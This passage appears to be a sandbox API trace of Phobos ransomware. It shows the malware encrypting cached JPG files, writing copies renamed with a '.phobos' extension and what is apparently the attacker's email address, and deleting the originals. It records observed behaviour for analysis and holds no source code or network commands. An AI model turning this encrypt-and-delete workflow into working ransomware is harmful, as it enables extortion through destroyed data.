"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[2].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0186.355] GetFileSizeEx (in: hFile=0xb8, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2158) returned 1 [0186.355] CloseHandle (hObject=0xb8) returned 1 [0186.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[2].jpg")) returned 0x2020 [0186.355] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[2].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb8 [0186.355] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.355] SetFilePointerEx (in: hFile=0xb8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.355] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[2].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.356] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.356] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.356] ReadFile (in: hFile=0xb8, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x86e, lpOverlapped=0x0) returned 1 [0186.388] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x870, dwBufLen=0x870 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x870) returned 1 [0186.388] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x870, lpOverlapped=0x0) returned 1 [0186.389] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32de8) returned 1 [0186.389] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.389] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.389] CryptDestroyKey (hKey=0xa32de8) returned 1 [0186.389] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.389] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.389] CloseHandle (hObject=0xb8) returned 1 [0186.389] CloseHandle (hObject=0x160) returned 1 [0186.389] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC02Gr[2].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc02gr[2].jpg")) returned 1 [0186.406] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.406] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc06ub[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.407] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1979) returned 1 [0186.407] CloseHandle (hObject=0x130) returned 1 [0186.407] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc06ub[1].jpg")) returned 0x2020 [0186.407] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc06ub[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc06ub[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.407] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.407] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc06ub[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.408] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ae8) returned 1 [0186.408] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.408] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x7bb, lpOverlapped=0x0) returned 1 [0186.427] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0, dwBufLen=0x7c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x7c0) returned 1 [0186.427] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x7c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x7c0, lpOverlapped=0x0) returned 1 [0186.428] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0186.428] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.428] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.428] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.428] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.429] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0186.429] CloseHandle (hObject=0x130) returned 1 [0186.429] CloseHandle (hObject=0x160) returned 1 [0186.429] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC06Ub[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc06ub[1].jpg")) returned 1 [0186.430] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.430] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0lf2[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.437] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2095) returned 1 [0186.437] CloseHandle (hObject=0x160) returned 1 [0186.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0lf2[1].jpg")) returned 0x2020 [0186.437] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0lf2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0lf2[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.437] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.437] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0lf2[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.438] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.438] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.438] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x82f, lpOverlapped=0x0) returned 1 [0186.447] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x830, dwBufLen=0x830 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x830) returned 1 [0186.447] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x830, lpOverlapped=0x0) returned 1 [0186.453] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0186.453] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.453] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.453] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.454] WriteFile (in: hFile=0x130, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.454] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.454] CloseHandle (hObject=0x160) returned 1 [0186.454] CloseHandle (hObject=0x130) returned 1 [0186.454] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBC0lf2[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbc0lf2[1].jpg")) returned 1 [0186.455] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe7kpz[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.455] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=11979) returned 1 [0186.455] CloseHandle (hObject=0x130) returned 1 [0186.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe7kpz[1].jpg")) returned 0x2020 [0186.455] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe7kpz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe7kpz[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.456] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.456] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.456] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe7kpz[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.457] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.457] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.457] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2ecb, lpOverlapped=0x0) returned 1 [0186.498] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2ed0, dwBufLen=0x2ed0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2ed0) returned 1 [0186.498] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2ed0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2ed0, lpOverlapped=0x0) returned 1 [0186.499] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0186.499] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.499] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0186.499] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0186.499] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0186.499] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0186.499] CloseHandle (hObject=0x130) returned 1 [0186.499] CloseHandle (hObject=0x160) returned 1 [0186.499] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE7KPZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe7kpz[1].jpg")) returned 1 [0186.501] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0186.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe9tdx[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.501] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10871) returned 1 [0186.501] CloseHandle (hObject=0x160) returned 1 [0186.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe9tdx[1].jpg")) returned 0x2020 [0186.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe9tdx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0186.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe9tdx[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0186.502] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.502] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0186.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBE9tdx[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbe9tdx[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0186.503] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0186.503] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0186.503] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, 